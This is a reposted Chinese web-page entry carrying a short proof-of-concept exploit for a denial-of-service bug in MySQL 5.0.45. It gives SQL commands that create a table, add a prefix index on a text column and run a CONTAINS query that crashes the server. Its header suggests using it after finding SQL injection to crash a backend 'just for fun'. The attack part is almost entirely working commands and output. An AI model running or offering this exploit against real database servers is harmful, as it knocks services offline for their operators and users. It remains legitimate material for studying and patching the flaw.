首頁 > 文章 > 資料庫 > mysql 5.0.45 （修改）拒绝服务漏洞

mysql 5.0.45 （修改）拒绝服务漏洞

WBOY原創: 2016-06-07 18:02:41791瀏覽

mysql 5.0.45 （修改）拒绝服务漏洞的方法，追求安全的朋友可以参考下。

mysql 5.0.45 （修改）拒绝服务漏洞
/*
* MySQL * Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/

mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query

陳述：

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

上一篇：mysql时间戳转成常用可读时间格式的两种方法下一篇：MySQL错误“Specified key was too long; max key length is 100

看更多

mysql 5.0.45 （修改）拒绝服务漏洞

相關文章